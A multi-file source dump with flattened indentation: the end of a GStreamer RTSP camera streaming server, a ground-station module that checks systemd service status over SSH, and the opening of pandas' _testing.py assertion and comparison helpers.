launch_str = launch_str + 'awb-gain-blue='+self.gain_blue
#Completing the pipe
if self.codec == 0:
launch_str = launch_str + ' ! video/x-h264, framerate='+str(self.fps)+'/1, width='+str(self.width)+', height='+str(self.height)+' ! h264parse ! rtph264pay name=pay0 pt=96 )'
elif self.codec == 1:
launch_str = launch_str + ' ! image/jpeg, framerate='+str(self.fps)+'/1, width='+str(self.width)+', height='+str(self.height)+' ! jpegparse ! rtpjpegpay name=pay0 pt=96 )'
else:
log.error("Illegal codec")
else: # USB Camera
# Ignore most of the parameters
log.info("USB camera ignored most of the parameters")
launch_str = '( v4l2src device='+self.device+' brightness='+str(self.brightness)+' contrast='+str(self.contrast)+' saturation='+str(self.saturation)
launch_str = launch_str + ' ! image/jpeg,width='+str(self.width)+',height='+str(self.height)+',framerate='+str(self.fps)+'/1 ! omxmjpegdec ! omxh264enc target-bitrate='+str(self.bitrate)+' control-rate=variable ! video/x-h264,profile=baseline ! h264parse ! rtph264pay name=pay0 pt=96 )'
log.debug(launch_str)
cam_mutex.acquire()
try:
log.info("Starting service on port "+str(self.port)+" at url /"+self.name)
self.factory.set_launch(launch_str)
self.server.set_service(str(self.port))
self.mounts.add_factory("/"+str(self.name), self.factory)
self.context_id = self.server.attach(None)
#mainloop.run()
self.mainthread = Thread(target=self.mainloop.run)
self.mainthread.daemon = True
self.mainthread.start()
self.running = True
finally:
cam_mutex.release()
log.info("Running RTSP Server")
def start(self):
p = subprocess.Popen("ps -ax | grep rpos.js", shell=True, stdout=subprocess.PIPE)
output = p.stdout.read()
while self.stayAwake and "node" in output:
if os.stat(self.file).st_mtime != self.configDate:
log.info("Updating stream settings")
self.readConfig()
self.updateConfig()
else:
time.sleep(1.0)
log.warning("Quitting service")
def disconnect_all(self, a, b):
return GstRtspServer.RTSPFilterResult.REMOVE
def stop(self):
if self.running:
log.debug("Suspending RTSP Server")
cam_mutex.acquire()
try:
self.server.client_filter(self.disconnect_all)
time.sleep(0.3)
self.mainloop.quit()
self.mainthread.join()
self.mounts.remove_factory("/h264")
GLib.Source.remove(self.context_id)
self.running = False
finally:
cam_mutex.release()
def updateConfig(self):
#TODO: Manipulate the running pipe rather than destroying and recreating it.
self.stop()
self.launch()
if __name__ == '__main__':
codec = 0 # Default to H264
if args.mjpeg:
codec = 1
streamServer = StreamServer(args.device, args.file, args.rtspport, args.rtspname, \
args.rtspresolutionwidth, args.rtspresolutionheight,\
codec)
streamServer.readConfig()
streamServer.launch()
streamServer.start()
|
systemdservices.py
|
import threading
import time
from groundstation.models import SystemdServiceRunning, SystemdServiceEnabled, SystemdService
from groundstation.utils import sendstate
services = [
"roscore.service",
"rosrecord.service",
"cameras.service",
"infrastructure.service",
"lidar.service",
"missioncontrol.service",
"se.service",
"statistics.service",
"vehicleinterface.service",
"pixhawk.service",
"mission_acceleration.service",
"mission_inspection.service",
"mission_joystick.service",
"mission_skidpad.service",
"mission_trackdrive.service",
]
class SystemdServices:
def __init__(self, ssh):
self.ssh = ssh
def start(self):
thread = threading.Thread(target=self.forever)
thread.daemon = True
thread.start()
def forever(self):
while 1:
try:
self.retreive_services()
except Exception, e:
print("[systemdservices] Someting unexpected happend while retreiving services: " + str(e))
time.sleep(1)
def retreive_services(self):
services_str = " ".join(services)
try:
statusnr_enabled, output_enabled = self.ssh.run_command("systemctl is-enabled " + services_str)
statusnr_active, output_active = self.ssh.run_command("systemctl is-active " + services_str)
except Exception, e:
out = []
for s in services:
out.append(SystemdService(name=s, running=SystemdServiceRunning.ERROR, statustext=str(e),
enabled=SystemdServiceEnabled.ERROR, lastupdate=time.time()))
sendstate({'systemdservices': out})
return
services_active = output_active.split("\n")
services_enabled = output_enabled.split("\n")
out = []
for i in range(len(services)):
out.append(SystemdService(name=services[i], lastupdate=time.time(),
running=SystemdServiceRunning.fromstring(services_active[i]),
enabled=SystemdServiceEnabled.fromstring(services_enabled[i]),
statustext="active: " + services_active[i] + "\n" + "enabled: " + services_enabled[i]))
sendstate({'systemdservices': out})
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas._typing import FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = False,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string"):
assert r.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(
lc, rc, obj=f"{obj}.categories",
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.left")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = f"""{obj} are different
{message}
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(np.asarray(left.asi8), np.asarray(right.asi8))
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact:
if not is_numeric_dtype(left.dtype):
raise AssertionError("check_exact may only be used with numeric Series")
assert_numpy_array_equal(
left._values, right._values, check_dtype=check_dtype, obj=str(obj)
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj=str(obj),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(left._values, right._values)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(left._values, right._values)
else:
_testing.assert_almost_equal(
left._values,
right._values,
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj=str(obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
